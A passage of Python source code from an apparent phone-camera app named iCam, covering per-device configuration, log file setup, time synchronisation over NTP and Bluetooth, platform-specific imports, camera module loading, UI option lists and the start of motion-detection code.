MY_DEBUG_STDERR_2 = True
MY_DEBUG_UPLOAD_MSG = True # For uploaded log messages
"""
MY_DEBUG_STDOUT = False
MY_DEBUG_STDERR = False
MY_DEBUG_STDERR_2 = False
MY_DEBUG_UPLOAD_MSG = False # For uploaded log messages
bluetoothMode = 0 # no BT
# bluetoothMode = 1 #BT server
uploadUnsentData = 2 # Send logs
elif deviceId == IMEI_6680:
LOCAL_FOLDER = "C:/iCam"
if DoesDriveExist("E:"):
LOCAL_FOLDER = "E:/iCam"
uploadMediaToYouTube = 0
uploadMediaToPicasa = 0
useiCamServer = 2
googleUsername = "googleUser"
BATTERY_LEVEL_THRESHOLD = 99
startButtonPressed = True
"""
This instructs phone not to resize photos taken and send them
at original resolution directly.
"""
MODE_FOR_PHONE_WITH_LITTLE_RAM_AND_UNRELIABLE_MEM_CARD = True
# To avoid resize also choose Sent res to (1280, 980)
# LOCAL_FOLDER_AUX = "C:/iCam"
"""
LOCAL_FOLDER_AUX = "D:/iCam"
if not os.path.exists(LOCAL_FOLDER_AUX):
os.makedirs(LOCAL_FOLDER_AUX)
"""
LOCAL_FOLDER_MEDIA_FILES = LOCAL_FOLDER_TEMP + "/Media"
# LOCAL_FOLDER_UNSENT_FILES = LOCAL_FOLDER_AUX + "/Unsent"
# LOCAL_FOLDER_UNSENT_FILES = LOCAL_FOLDER + "/Unsent"
LOCAL_FOLDER_UNSENT_FILES = LOCAL_FOLDER + "/Unsent"
# LOCAL_FOLDER_UNSENT_FILES = "D:/Unsent"
ERASE_ORIGINAL_MEDIA_FILE_AFTER_READ = True
bluetoothMode = 2 # BT client
bluetoothServerAddress = INTERNET_PROXY_PHONE_BLUETOOTH_ADDRESS
"""
Saving the state in C:\iCam - avoiding writing much on the mem-card,
since 6680 sometimes corrupts mem-cards...
"""
STATE_PATH_FILENAME = "C:/iCam/" + STATE_FILENAME
LOCAL_CONFIG_PATH_FILENAME = "C:/iCam/" + LOCAL_CONFIG_FILENAME
photoResolutionIndex = 10 # To allow sending the photo at Max res
cameraMode[0] = 1
cameraMode[1] = 1
# videoRecordDuration[0] = 25
# videoRecordDuration[1] = 15
videoRecordDuration[0] = 30
videoRecordDuration[1] = 30
# Don't send any unsent data (maybe make it 1!!!!)
uploadUnsentData = 0
"""
MY_DEBUG_STDOUT = False
MY_DEBUG_STDERR = False
MY_DEBUG_STDERR_2 = False
MY_DEBUG_UPLOAD_MSG = False # For uploaded log messages
"""
elif deviceId == IMEI_N82:
LOCAL_FOLDER = "C:/iCam"
if DoesDriveExist("E:"):
LOCAL_FOLDER = "E:/iCam"
uploadMediaToYouTube = 0
uploadMediaToPicasa = 0
useiCamServer = 2
googleUsername = "googleUser"
BATTERY_LEVEL_THRESHOLD = 50
bluetoothMode = 1 # BT server
uploadHowManyOfLatestBluetoothMessages = 4
# startButtonPressed = True
"""
LOCAL_FOLDER_AUX = "D:/iCam"
if not os.path.exists(LOCAL_FOLDER_AUX):
os.makedirs(LOCAL_FOLDER_AUX)
LOCAL_FOLDER_MEDIA_FILES = LOCAL_FOLDER_AUX + "/Media"
"""
LOCAL_FOLDER_MEDIA_FILES = LOCAL_FOLDER + "/Media"
LOCAL_FOLDER_UNSENT_FILES = LOCAL_FOLDER + "/Unsent"
ERASE_ORIGINAL_MEDIA_FILE_AFTER_READ = True
STATE_PATH_FILENAME = "C:/iCam/" + STATE_FILENAME
LOCAL_CONFIG_PATH_FILENAME = "C:/iCam/" + LOCAL_CONFIG_FILENAME
elif RASPBIAN_OS == True: #!!!!TODO: check deviceId
bluetoothMode = 1 # BT server
#accessPointRetryConnect = True #False
#MY_DEBUG_STDOUT = False
#MY_DEBUG_STDERR = False
#MY_DEBUG_STDERR_2 = False
MY_DEBUG_UPLOAD_MSG = False # For uploaded log messages
STATE_PATH_FILENAME_BACKUP = STATE_PATH_FILENAME + STATE_BACKUP_EXTENSION
# END PERSONAL SPECIFIC
# CreateDirectoriesAndLogFiles()
###############################################################################
###############################################################################
###############################################################################
#################################IMPORTS#######################################
###############################################################################
###############################################################################
###############################################################################
import thread
import zlib
def MyThreadStart(myFunc, funcParams=()):
#DebugPrint("Entered MyThreadStart().")
if SYMBIAN_OS:
if not _PyS60_1_9_OR_NEWER: #pyS60VersionNumber <= 14
"""
thread.start_new_thread does not work well on PyS60 1.4.5 - see,
for example,
http://www.developer.nokia.com/Community/Discussion/showthread.php?172950-Starting-a-new-thread-silently-fails-in-N97-%28PyS60-1.4.5%29
"""
myFunc()
#DebugPrint("Exiting MyThreadStart().")
return
# !!!!Use a thread pool - maybe use the one from Twisted
thread.start_new_thread(myFunc, funcParams)
#DebugPrint("Exiting MyThreadStart().")
"""
I put this code here because I want to create ASAP the log files and see in
the log files any error generated by importing spcecial modules, etc.
Unfortunately, there is no other way - see for ex.
http://stackoverflow.com/questions/1590608/is-it-possible-to-forward-declare-a-function-in-python.
# !!!!For nicer code I should put GetCurrentDateTime() and
CreateDirectoriesAndLogFiles() in a separate module and import it here.
Note: Before creating the log files, the stdout/err will output to the screen.
I tried to avoid writing on the screen, which is not nice maybe for the user:
- see LoadStateFromFile() - it has disabled the writing to stdout/err
before executing CreateDirectoriesAndLogFiles();
- TODO!!!!: MoveFileBetweenAnyDrives() (used by LoadStateFromFile())
however does NOT disable the writing to stdout/err;
- maybe? there are other functions/global pieces of code writing
before to stdout/err.
"""
def GetTime():
"""
Note that S60 2nd edition has GetTime() with resolution of 1
second (not milliseconds, as in S60 3rd ed, and the rest).
"""
if SYMBIAN_S60_OS:
"""
PyS60 1.4.5 uses rather standard way to get time(): see timemodule.c.
I guess this is why we require to decr time.timezone (on FP2 at least)
PyS60 2.0 uses a different way to obtain the time - see PyS60 src code
file \src\newcore\Symbian\src\symbian_adaptation.cpp, function
double symbian_clock()
{
TInt period = 1000*1000;
HAL::Get(HALData::ESystemTickPeriod, period);
/* Return TickCount in seconds */
return (double)User::TickCount() * ((double)period / (1000.0 * 1000.0));
}
"""
#if SYMBIAN_S60_2ND_ED: # (S60_EDITION[0] < 3)):
#if (phoneModel == "Nokia6680") or (phoneModel == "NokiaN70"):
if sys.version_info[0 : 2] == (2, 2):
"""
PyS60 1.4.5 (running on S60 2nd edition, but also on other phones)
has the issue with displaying the current hour w.r.t. ~UTC.
Tested this on PyS60 1.4.5 on E7 (normally 2nd edition phones).
!!!!TODO: Test on (other) phones with time zone setting different
than Bucharest, Romania
#!!!!TEST on S60 1st ed
From http://docs.python.org/2/library/time.html:
time.timezone
"The offset of the local (non-DST) timezone, in seconds west
of UTC (negative in most of Western Europe, positive in the US,
zero in the UK)."
"""
#return time.time() - 2 * 3600
return time.time() + time.timezone
return time.time()
# The type of this one is a struct? localtime
def GetCurrentDateTime():
# global phoneModel
if SYMBIAN_OS:
return time.localtime(GetTime())
elif ANDROID_OS:
return time.localtime()
elif iOS_PYOBJC:
return time.localtime()
elif WINDOWS_OS:
return time.localtime()
elif UNIX_OS:
return time.localtime()
elif WINDOWS_CE_OS_PYTHONCE:
return time.localtime()
elif RASPBIAN_OS:
return time.localtime()
def TimeSyncForTimeResettingPhones():
"""
This is kind of useless time sync, useful only if we have a phone
without Internet connectivity.
This situation is helpful AT LEAST for my Nokia 6680, where the time is
reset when taking out the battery.
"Preserve" the flow of time locally:
if we detect that the time is now lower than what it was last time
iCam was run, in state.bin, we assume that the time in state.bin is
correct and set it there.
"""
try:
# !!!Maybe do also if stateTime < GetTime() - 3 months, etc?
if stateTime > GetTime():
if SYMBIAN_OS:
e32.set_home_time(stateTime)
except:
DebugPrintErrorTrace()
stdoutFile = None
stderrFile = None
stdoutFileName = None
stderrFileName = None
def CreateDirectoriesAndLogFiles():
global stdoutFile, stderrFile
global stdoutFileName, stderrFileName
global LOCAL_FOLDER, LOCAL_FOLDER_MEDIA_FILES, LOCAL_FOLDER_UNSENT_FILES
"""
global STATE_PATH_FILENAME
STATE_PATH_FILENAME = LOCAL_FOLDER + "/" + STATE_FILENAME
"""
try:
"""
!!!!Check also that these folders are not files with isfile()...
"""
if not os.path.exists(LOCAL_FOLDER):
os.makedirs(LOCAL_FOLDER)
except:
if MY_DEBUG_STDERR:
traceback.print_exc()
#sys.stderr.flush()
try:
if not os.path.exists(LOCAL_FOLDER_MEDIA_FILES):
os.makedirs(LOCAL_FOLDER_MEDIA_FILES)
except:
if MY_DEBUG_STDERR:
traceback.print_exc()
#sys.stderr.flush()
try:
# Note: On WinCE normally the Unsent media files are stored in .../DCIM
if not os.path.exists(LOCAL_FOLDER_UNSENT_FILES):
os.makedirs(LOCAL_FOLDER_UNSENT_FILES)
except:
if MY_DEBUG_STDERR:
traceback.print_exc()
#sys.stderr.flush()
try:
if not os.path.exists(LOCAL_FOLDER_TEMP):
os.makedirs(LOCAL_FOLDER_TEMP)
except:
if MY_DEBUG_STDERR:
traceback.print_exc()
#sys.stderr.flush()
try:
STDDateTime = time.strftime("%Y_%m_%d_%H_%M_%S", GetCurrentDateTime())
if MY_DEBUG_STDOUT:
try:
sys.stdout.flush()
except:
if MY_DEBUG_STDERR:
traceback.print_exc()
"""
"""
"""
Nokia 6680 has little space (drive C - ~3MB) since it does not
have an RS-MMC broke, so we can't store the long stdout
log files.
"""
# if deviceId != IMEI_6680:
stdoutFileName = STDOUT_FILENAME_PREFIX + STDDateTime + ".txt"
# if True:
# if False:
stdoutFile = open(LOCAL_FOLDER + "/" + stdoutFileName, "a")
sys.stdout = stdoutFile
sys.stdout.flush()
if MY_DEBUG_STDERR:
try:
sys.stderr.flush()
except:
if MY_DEBUG_STDERR:
traceback.print_exc()
stderrFileName = STDERR_FILENAME_PREFIX + STDDateTime + ".txt"
# if True:
# if False:
stderrFile = open(LOCAL_FOLDER + "/" + stderrFileName, "a")
sys.stderr = stderrFile
sys.stderr.flush()
except:
DebugPrintErrorTrace()
"""
# BEFORE_MAIN:
We make here the call, because we want to have the STD files created ASAP:
- to record errors ASAP.
We call LoadStateFromFile() before CreateDirectoriesAndLogFiles() because we
want to initialize the MY_DEBUG_STDOUT/ERR variables which determine in
CreateDirectoriesAndLogFiles() that we create the std*.txt files.
"""
LoadStateFromFile(STATE_PATH_FILENAME, myDebugStdout=False, myDebugStderr=False)
CreateDirectoriesAndLogFiles()
"""
(Minor): Chose to write error to log file, if any, instead of having log file with
updated time.
"""
if deviceId == IMEI_6680:
TimeSyncForTimeResettingPhones()
if deviceId == IMEI_E7:
"""
For these to work we need to have the python files of the respective
profiler installed on the phone.
"""
try:
import profile
#import figleaf
#figleaf.start()
#import hotshot
except:
DebugPrintErrorTrace()
DebugPrint("sys.path = %s" % str(sys.path))
###############################################################################
###############################################################################
#################################TIME SYNC#####################################
###############################################################################
###############################################################################
ntplib = None
try:
if sys.version_info[0 : 2] >= (2, 5):
"""
ntplib uses decorators, not supported in Python 2.2.
However, I guess we can easily make it work for Python 2.2,
if ever required.
"""
import ntplib
except:
DebugPrint("Not able to import the ntplib module --> ntplib = %s." % \
str(ntplib))
DebugPrintErrorTrace()
"""
We have 2 alternatives for the BT server to send the BT time sync:
- BluetoothTimeSync() called in TimeSyncNTP(), which is called at the
start of iCam. But this might be executed too often.
BluetoothTimeSync() sends a BT message with exact time of the
BT server which should be already correct time.
- BluetoothTimeSyncWithDrift(btClientDeviceId, btMsgSize)
- sends an "adjust-date-and-time-using-delta" when notices that
the message received in BluetoothMessageProcessAndDelete()
has a very bit time drift.
The BT client for S60 sets in BluetoothMessageCallback(btMsgId) the
arrival time of the BT time sync msg:
dictBtMsgTime[btMsgId] = crtTime
This time is used in BluetoothMessageProcessTIM(btMsgId).
"""
"""
We do NOT execute BluetoothTimeSyncWithDrift() in BluetoothMessageCallback()
because we don't want to unpack the BT SMF message to update btMsgStateTime.
"""
def BluetoothTimeSyncWithDrift(btClientDeviceId, btMsgSize, btMsgId):
"""
This method is supposed to be executed by the BT server.
This is for time sync performed in a BT "LAN" of devices.
Time sync between BT server and proxies.
We assume the BT server time is correct, e.g., taken from the iCam server.
- this function needs to be called IMMEDIATELY as a callback when
receiving BT message:
- on S60 3rd we have such callback
- on Android we can devise a separate thread that checks in the
BT_Received folder for new files and informs iCam.
"""
global btMsgStateTime
return
DebugPrint("Entered BluetoothTimeSyncWithDrift(btClientDeviceId=%s, " \
"btMsgSize=%d, btMsgId=%s)." % \
(btClientDeviceId, btMsgSize, str(btMsgId)))
# We estimate (overconservatively) the time it takes to send BT message.
deltaBT = float(btMsgSize / 20000.0) + 10
if SYMBIAN_S60_OS:
try:
# Get message time of arrival.
btMsgArrivalTime = bluetoothInbox.time(btMsgId)
btMsgArrivalTimeStruct = time.localtime(btMsgArrivalTime)
"""
The problem is the BT message might have been received in another
session of iCam, was already in the Inbox, and therefore
BluetoothMessageCallback() was not called for btMsgId, hence
it is not present in dictBtMsgTime[btMsgId].
Hence we update the entry with btMsgArrivalTime.
"""
if btMsgId not in dictBtMsgTime:
dictBtMsgTime[btMsgId] = btMsgArrivalTime
except:
btMsgArrivalTime = "[ERROR]"
btMsgArrivalTimeStruct = -1
DebugPrintErrorTrace()
try:
DebugPrint(
" BluetoothTimeSyncWithDrift(): btMsgArrivalTime = %s, " \
"btMsgArrivalTimeStruct = %s" % \
(str(btMsgArrivalTime), \
time.strftime("%Y_%m_%d_%H_%M_%S", btMsgArrivalTimeStruct)))
except:
DebugPrintErrorTrace()
try:
DebugPrint(" BluetoothTimeSyncWithDrift(): dictBtMsgTime = %s" % \
str(dictBtMsgTime))
"""
Was giving (at least once) exception:
Traceback (most recent call last):
File "a.py", line 1180, in BluetoothTimeSyncWithDrift
KeyError: 1153689
- see Z:\1PhD\ReVival\Logs\NokiaN82\2013_12_22_2\stderr_2013_12_22_11_47_41.txt
The reason is the BT message might have been received in another
session of iCam, was already in the Inbox, and therefore
BluetoothMessageCallback() was not called for btMsgId, hence it
is not present in dictBtMsgTime[btMsgId].
But I updated the entry - see above:
if btMsgId not in dictBtMsgTime:
...
"""
DebugPrint(" BluetoothTimeSyncWithDrift(): dictBtMsgTime[btMsgId] = %s" % \
str(dictBtMsgTime[btMsgId]))
except:
DebugPrintErrorTrace()
try:
"""
Note that btMsgStateTime has to be updated with the value from the
SMF BT msg, from btMsgId.
"""
DebugPrint(" BluetoothTimeSyncWithDrift(): btMsgStateTime = %s" % \
str(btMsgStateTime))
# The BT server looks at time btMsgStateTime now and computes the time drift.
#timeDrift = GetTime() - (btMsgStateTime + deltaBT)
# The BT server looks at arrival time of BT msg and computes the time drift.
# dictBtMsgTime[btMsgId] = time of arrival of BT message
# btMsgStateTime = time reported in the state of the BT message.
timeDrift = dictBtMsgTime[btMsgId] - (btMsgStateTime + deltaBT)
DebugPrint(" BluetoothTimeSyncWithDrift(): deltaBT = %d, " \
"timeDrift = %d." % (deltaBT, timeDrift))
if abs(timeDrift) > 1800: # 30 mins
DebugPrint(" BluetoothTimeSyncWithDrift(): Running " \
"ExecuteCommands().")
ExecuteCommands(
"send-command-via-bluetooth %s " \
"adjust-date-and-time-using-delta %d" % \
(btAddrTable[btClientDeviceId], timeDrift))
except:
DebugPrintErrorTrace()
def BluetoothTimeSync():
return
"""
Send the current time to the BT clients:
The info is relayed via the BT message name - the message is empty
"""
if SYMBIAN_OS:
try:
#for btClientDeviceIdVal in btAddrTable.itervalues():
for btClientDeviceIdVal in btAddrTable:
#for btClientDeviceIdVal in [BT_ADDR_6680, BT_ADDR_6120]:
try:
#crtTime = response.tx_time
crtTime = GetTime() + \
5 # We account for transmitting the msg via BT
pathFileName = LOCAL_FOLDER_TEMP + "/" + \
BT_OBEX_FILENAME_PREFIX + \
"%d" % int(crtTime) + BT_OBEX_EXTENSION_TIM
"""
Requires backslashes, otherwise btsocket.bt_obex_send_file
gives exception: error: (22, 'Invalid argument')
"""
pathFileNameWithBackslashes = \
pathFileName.replace("/", "\\")
fOutput = open(pathFileNameWithBackslashes, "wb")
fOutput.close()
os.unlink(pathFileNameWithBackslashes)
BluetoothClientDiscoverServer(btClientDeviceIdVal)
btsocket.bt_obex_send_file(btAddrTable[btClientDeviceIdVal],
bluetoothServerOPPServicePort[btClientDeviceIdVal],
unicode(pathFileNameWithBackslashes))
except:
DebugPrintErrorTrace()
except:
DebugPrintErrorTrace()
def TimeSyncNTP():
DebugPrint("Entered TimeSyncNTP(): ntplib = %s." % str(ntplib))
"""
Note that TimeSyncNTP() renders useless iCamViewer\TimeSync.py .
Obviously, TimeSyncNTP() requires Internet connection to access NTP server.
"""
if ntplib == None:
return
#DebugPrint("Entered TimeSyncNTP().")
# Insipred from http://stackoverflow.com/questions/5222951/easy-way-to-get-the-correct-time-in-python
try:
client = ntplib.NTPClient()
"""
The response is a float representing the number of seconds
from beginning of Unix era.
"""
#response = client.request("pool.ntp.org")
response = client.request("europe.pool.ntp.org", version=3)
#!!!!TODO: We should execute even faster the time setting - not sending string command to be parsed by ExecuteCommands()...;
#!!!!TODO: therefore make separate function SetDateTime() and call it directly and make ExecuteCommands() also call it.
ExecuteCommands("set-date-and-time %.3f" % response.tx_time, \
fastExec=True)
crtTime = GetTime()
DebugPrint("TimeSyncNTP(): response.tx_time = %s, crtTime = %s" % \
(str(response.tx_time), str(crtTime)))
#print "time.localtime(response.tx_time) =", time.localtime(response.tx_time)
#print "Alex: " + time.strftime('%m %d %H %M %Y.%S', time.localtime(response.tx_time))
if False:
BluetoothTimeSync()
except:
DebugPrint("TimeSyncNTP(): Could not sync with time server.")
DebugPrintErrorTrace()
TIME_DIFFERENCE_BETWEEN_LOCAL_AND_ICAM_SERVER = 0 #3600 #0 # [seconds]
def TimeSyncWithiCamServer():
"""
!!!!TODO: we currently don't use mobile-revival.110mb.com because it's time
is not that reliable (+-5 min difference).
"""
return
DebugPrint("Entered TimeSyncWithiCamServer().")
#"""
if accessPointRetryConnect:
return
#!!!!TODO: use a serious time server like time....com (or maybe NTP)
#!!!!TODO: measure and account for the time passed during urlopen()
# Get time from the iCam server
try:
# Look for Python runtime for Symbian, Android, etc!!!!
iCamTimeCompressed = urllib.urlopen("http://" +
ICAM_SERVER_NAME + WEB_FOLDER +
"/GetTime.php").read()
iCamTime = iCamTimeCompressed.decode("zlib")
except:
DebugPrintErrorTrace()
return
#"""
#iCamTime = "13:00:00 28-06-2013"
try:
# We do not run this code, because on SYMBIAN_OS mktime() doesn't work
if False:
tokens = iCamTime.split(" ")
tok2 = tokens[1].split("-")
#(tm_year, tm_mon, tm_mday) = tok2
tm_year = int(tok2[0])
tm_mon = int(tok2[1])
tm_mday = int(tok2[2])
tok2 = tokens[0].split(":")
tm_hour = int(tok2[0])
tm_min = int(tok2[1])
tm_sec = int(tok2[2])
timeReceived = (tm_year, tm_mon, tm_mday, tm_hour, tm_min, tm_sec, \
-1, -1, -1)
# These last 3 parameters are tm_wday, tm_yday, tm_isdst
#print "timeReceived =", timeReceived
targetTime = time.mktime(timeReceived)
#targetTime = GetTime()
if True:
targetTime = int(iCamTime)
DebugPrint("TimeSyncWithiCamServer(): Received from iCam server " \
"targetTime = %s." % str(targetTime))
targetTime += TIME_DIFFERENCE_BETWEEN_LOCAL_AND_ICAM_SERVER
ExecuteCommands("set-date-and-time " + str(targetTime))
except:
DebugPrintErrorTrace()
#return
###############################################################################
###############################################################################
###############################END TIME SYNC###################################
###############################################################################
###############################################################################
import httplib
"""
# Need to include it in lib(_std).zip, since it is not a standard library.
try:
import httplib2
import urllib3
except:
DebugPrintErrorTrace()
"""
import urllib
sysagentImported = False
# if SYMBIAN_OS:
if SYMBIAN_S60_OS:
try:
import sysagent
sysagentImported = True
except:
DebugPrint("Not able to import the sysagent module.")
DebugPrintErrorTrace()
import telephone
import graphics
# from key_codes import *
import audio
import location
import positioning
elif SYMBIAN_UIQ_OS:
try:
print "Now we give import telephone."
import telephone
print "Calling at %s." % time.asctime(GetCurrentDateTime())
sys.stdout.flush()
telephone.dial(u"0770000000")
e32.ao_sleep(17)
telephone.hang_up()
e32.ao_sleep(2)
except:
DebugPrintErrorTrace()
# import comdef
if SYMBIAN_OS:
try:
# pyS60VersionNumber are the first 2 digits of PyS60's version
pyS60VersionNumber = e32.pys60_version_info[0] * 10 + \
e32.pys60_version_info[1]
if pyS60VersionNumber <= 14:
# (1, 4, 5, 'final', 0)
_PyS60_1_9_OR_NEWER = False
elif pyS60VersionNumber >= 19:
# (2, 0, 0, 'svn3873', 0)
_PyS60_1_9_OR_NEWER = True
except:
DebugPrintErrorTrace()
if not _PyS60_1_9_OR_NEWER:
"""
On Python 2.2 we cannot use zip packages for module imports, so we
replace the "lib_std.zip" with a folder with the
uncompressed content.
"""
sys.path[0] = os.path.join(os.getcwd(), "site-packages")
DebugPrint("sys.path (updated) = %s" % str(sys.path))
###############################################################################
###############################################################################
##########################BEGIN S60 CAMERA MODULE IMPORT#######################
###############################################################################
###############################################################################
"""
IMPORTANT NOTE: The import of a module inside a function is visible ONLY
inside the function - TODO!! - but we can declare as global camera, _camera2, etc.
#def ImportCameraModule():
"""
# """
camera2IsImported = False
# if SYMBIAN_OS and SYMBIAN_S60_OS:
if SYMBIAN_S60_OS:
if _PyS60_1_9_OR_NEWER:
if deviceId == IMEI_G810: # Was this really for G810, or was it different? I think I was just testing if loading the .pyd gave errors, which it was...
"""
NOTE: Samsung G810 requires a different initialization in camera(2).py than
for Nokia S60 phones - DOCUMENT BETTER!!!!TODO!!!!!!!! - see 2do_iCam_Samsung_G810.txt:
" the iCam was crashing at camera operations because iCam is creating more instances (for device for image_size(); for VGA camera besides Main camera) and this generates errors in ReserveComplete
for example 2 GeneralUseCameraS60(cameraId), without release?? crashes iCam".
Also, it doesn't work video recording.
IMPORTANT: It seems imp.load_dynamic() crashes PyS60 1.4.5
without exception.
"""
try:
import imp
# Gives exception "ImportError: dlopen: Load failed"
#_camera2 = imp.load_dynamic("_camera2",
# "kf__camera2_e21e55ef.pyd")
# Gives exception "ImportError: dlopen: Load failed"
#_camera2 = imp.load_dynamic("_camera2",
# r"E:\sys\bin\kf__camera2_e21e55ef.pyd")
# Gives exception "ImportError: dlopen: Load failed"
# _camera2 = imp.load_dynamic("_camera2",
# r"E:\sys\bin\251__camera2.pyd")
# Works
# _camera2 = imp.load_dynamic("_camera", "251__camera.pyd")
# Gives exception "ImportError: dlopen: Load failed"
# _camera2 = imp.load_dynamic("_camera", "kf__camera_e21e55ef.pyd")
# Gives exception "ImportError: dlopen: Load failed"
#_camera2 = imp.load_dynamic("sysagent",
# "kf_sysagent_e21e55ef.pyd")
# Not tried
# _camera2 = imp.load_dynamic("pyinbox", "kf_pyinbox_e21e55ef.pyd")
# _camera2 = imp.load_dynamic("camera", "kf__camera_e21e55ef.pyd")
# Gives exception "ImportError: dlopen: Load failed"
_camera2 = imp.load_dynamic("_camera2", "kf__camera2_e21e55ef.pyd")
DebugPrint("Imported the _camera2.pyd module: _camera2 = %s." % \
str(_camera2))
except ImportError:
DebugPrint("Not able to load_dynamic the _camera2.pyd module.")
DebugPrintErrorTrace()
try:
import camera2 as camera
# import camera2
camera2IsImported = True
DebugPrint("Imported the camera2 module.")
except ImportError:
DebugPrint("Not able to import the camera2 module.")
DebugPrintErrorTrace()
# """
try:
import camera
except:
# except ImportError:
DebugPrint("Not able to import the camera module.")
DebugPrintErrorTrace()
# For PyS60 1.4.5
else:
try:
import camera
except:
# except ImportError:
DebugPrint("Not able to import the camera module.")
DebugPrintErrorTrace()
###############################################################################
###############################################################################
###########################END S60 CAMERA MODULE IMPORT########################
###############################################################################
###############################################################################
if SYMBIAN_S60_OS:
sensorsAvailable = ""
try:
import sensor
# sensorsAvailable = sensor.list_channels()
sensorsAvailable = sensor.sensors()
"""
Both N95, PyS60 1.4.5 and 2.0 and N82, PyS60 2.0 give
sensorsAvailable = {u'RotSensor': {'category': 321, 'id': 12350},
u'AccSensor': {'category': 268505087, 'id': 271003684}}
From http://wiki.forum.nokia.com/index.php/S60_Sensor_Framework
"Note that the old sensor API plug-ins are not compatible with
the S60 Sensor Framework. In addition, applications created with
Sensor FW do not work in S60 3rd Edition, FP1 devices other than
the Nokia E66 mobile device. If you wish to provide just one
installation file, you can pack the sensor API parts into an ECom
plug-in, build one file with the S60 5th Edition SDK and another
with the S60 3rd Edition MR SDK, and then load the correct one
during runtime."
"""
except:
DebugPrint("Not able to import the sensor module.")
DebugPrintErrorTrace()
# Not available on PyS60 1.4.5 which uses Py 2.2.2 - available from Py 2.3.
# import datetime
try:
import pyinbox
except:
DebugPrint("Not able to import the pyinbox module.")
DebugPrintErrorTrace()
try:
import socket
except:
DebugPrint("Not able to import the socket module.")
DebugPrintErrorTrace()
"""
To have socket timeout on PyS60 1.4.5 see for ex
http://discussion.forum.nokia.com/forum/showthread.php?72774-socket-timeout
Use maybe Tsocket extension - see also
http://discussion.forum.nokia.com/forum/showthread.php?109520-announce-tsocket-socket-module-timeout-on-connect.
Note: at least at the first Internet access, iCam running at least on Nokia E7
seems to wait somewhat longer than the specified SOCKET_DEFAULT_TIMEOUT
(so SOCKET_DEFAULT_TIMEOUT doesn't seem to be a hard deadline).
"""
SOCKET_DEFAULT_TIMEOUT = 20.0
# SOCKET_DEFAULT_TIMEOUT = 10.0
# Gives many timeouts, at least when the server was down:
# socket.setdefaulttimeout(5.0)
try:
# Inspired from https://groups.google.com/group/comp.lang.python/browse_thread/thread/ff84e7340988c168/
# socket.setdefaulttimeout(5.0)
"""
From http://docs.python.org/library/socket.html#socket.setdefaulttimeout:
"A value of None indicates that new socket objects have no timeout.
When the socket module is first imported, the default is None."
Also note that on Windows it seems that the default timeout is
20-30 seconds.
"""
socket.setdefaulttimeout(SOCKET_DEFAULT_TIMEOUT)
except:
DebugPrint("Not able to use socket.setdefaulttimeout() - maybe because " \
"running on PyS60 1.4.5.")
DebugPrintErrorTrace()
misoIsImported = False
# if SYMBIAN_OS:
if SYMBIAN_S60_OS:
if _PyS60_1_9_OR_NEWER:
try:
# Not supported in PyS60 v1.4.5, where it will generate an
# ImportError exception.
import btsocket
except:
DebugPrint("Cannot import module btsocket - maybe because you " \
"are using PyS60 v1.4.5.")
DebugPrintErrorTrace()
else:
# On PyS60 1.4.x, socket contained the BT functionality also.
import socket as btsocket
try:
import miso
misoIsImported = True
except:
DebugPrint("Not able to import the miso module.")
DebugPrintErrorTrace()
try:
import inbox
inboxIsImported = True
except:
inboxIsImported = False
(exceptionTypeG, exceptionValueG, exceptionTracebackG) = sys.exc_info()
myTextGlobal = "Cannot import inbox - details: %s." % \
repr(traceback.format_tb(exceptionTracebackG))
# if MY_DEBUG_UPLOAD_MSG:
# UploadGZippedData(deviceId, myTextGlobal, ICAM_SERVER_NAME,
# WEBPAGE_UL_GZIPPED_TEXT, None)
DebugPrint(myTextGlobal)
DebugPrintErrorTrace()
import messaging
###############################################################################
###############################################################################
###############################################################################
###############################END IMPORTS#####################################
###############################################################################
###############################################################################
###############################################################################
###############################################################################
###############################################################################
################################STRINGS########################################
###############################################################################
###############################################################################
"""
See http://www.daniweb.com/forums/thread138449.html and
http://bytes.com/topic/python/answers/768072-nameerror-global-name-addbook-not-defined
"""
# pauseIntervalStr = None
# photoResolutionStr = None
# photoModeStr = None
# flashStr = None
# exposureStr = None
# whiteBalanceStr = None
pauseIntervalStr = [
["0 sec (Burst mode)", 0],
["1 sec", 1],
["5 sec", 5],
["10 sec", 10],
["15 sec", 15],
["20 sec", 20],
["30 sec", 30],
["45 sec", 45],
["1 min", 60],
["2 min", 120],
["3 min", 180],
["4 min", 240],
["5 min", 300],
["7 min", 420],
["10 min", 600],
["15 min", 900],
["20 min", 1200],
["30 min", 1800],
["45 min", 2700],
["50 min", 3000],
["1 hr", 3600],
["2 hr", 7200],
["3 hr", 10800],
["4 hr", 14400],
["5 hr", 18000],
["6 hr", 21600],
["10 hr", 36000],
["12 hr", 43200],
["24 hr", 86400]
]
photoResolutionStr = [
["Do Not Upload Photo", (0, 0)],
["Use Local Resolution", (-1, -1)],
["40x30", (40, 30)],
["80x60", (80, 60)],
["160x120", (160, 120)],
["240x180", (240, 180)],
["320x240", (320, 240)],
["400x300", (400, 300)],
["512x384", (512, 384)],
["640x480", (640, 480)],
["1152x864", (1152, 864)],
["1280x960", (1280, 960)],
["1600x1200", (1600, 1200)],
["2048x1536", (2048, 1536)],
["2592x1456", (2592, 1456)],
["2592x1944", (2592, 1944)],
["3264x1832", (3264, 1832)],
["3264x2448", (3264, 2448)],
["4000x2248", (4000, 2248)],
["4000x3000", (4000, 3000)]
]
photoModeStr = [
["RGB12", "RGB12"],
["RGB16", "RGB16"],
["RGB24", "RGB"],
["JPEG_Exif", "JPEG_Exif"],
["JPEG_JFIF", "JPEG_JFIF"]
]
flashStr = [
["Auto", "auto"],
["None", "none"],
["Red_eye_reduce", "red_eye_reduce"],
["Forced", "forced"],
["Fill_in", "fill_in"]
]
exposureStr = [
["Auto", "auto"],
["Center", "center"],
["Backlight", "backlight"],
["Night", "night"]
]
whiteBalanceStr = [
["Auto", "auto"],
["Daylight", "daylight"],
["Cloudy", "cloudy"],
["Tungsten", "tungsten"],
["Fluorescent", "fluorescent"],
["Flash", "flash"]
]
###############################################################################
###############################################################################
###############################################################################
##############################END STRINGS######################################
###############################################################################
###############################################################################
###############################################################################
###############################################################################
###############################################################################
############################MOTION DETECTION###################################
###############################################################################
###############################################################################
MAX_NUM_HOTSPOTS = 5
hotspot = []
# BEFORE_MAIN: For modularity we execute here!!
for myI in range(MAX_NUM_HOTSPOTS):
hotspot += [[[0, 0], [0, 0]]]
def SetMotionDetectionHotspot(hotspotIndex,
percentsUL_X, percentsUL_Y,
percentsLR_X, percentsLR_Y):
global hotspot, MAX_NUM_HOTSPOTS
if hotspotIndex >= MAX_NUM_HOTSPOTS:
return
hotspot[hotspotIndex][0][0] = percentsUL_X / 100.0
